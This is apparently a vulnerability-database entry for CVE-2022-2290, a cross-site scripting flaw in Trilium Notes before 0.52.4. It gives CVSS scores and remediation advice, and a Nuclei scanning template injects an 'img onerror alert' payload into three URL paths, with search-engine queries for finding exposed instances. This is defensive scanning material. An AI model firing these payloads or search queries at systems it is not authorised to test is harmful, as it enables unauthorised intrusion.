Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-2290
HistoryJul 05, 2022 - 7:53 p.m.

Trilium <0.52.4 - Cross-Site Scripting

2022-07-0519:53:31
ProjectDiscovery
github.com
4
cve
cross-site scripting
trilium
security vulnerability
huntr_project

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

41.5%

Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

id: CVE-2022-2290

info:
  name: Trilium <0.52.4 - Cross-Site Scripting
  author: dbrwsky
  severity: medium
  description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Trilium instance.
  remediation: |
    Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
  reference:
    - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/
    - https://github.com/zadam/trilium
    - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2290
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-2290
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.41295
    cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: trilium_project
    product: trilium
    shodan-query:
      - title:"Trilium Notes"
      - http.title:"trilium notes"
    fofa-query: title="trilium notes"
    google-query: intitle:"trilium notes"
  tags: cve,cve2022,xss,trilium,huntr,trilium_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
      - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
      - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "No handler matched for custom <img src=x onerror=alert(document.domain)>"
          - "Note '<img src=x onerror=alert(document.domain)>' not found"
        condition: or

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 404
# digest: 4b0a00483046022100d30362b6d681b6b532b5b9d0e0de0183446a3d6e63cbbc52fa25f57cbcd9573102210096a5a9f8e18a07ee00f58819fd8346bd275fc7ba0a16e1e8944ec64cfc43cfb6:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

41.5%

Related for NUCLEI:CVE-2022-2290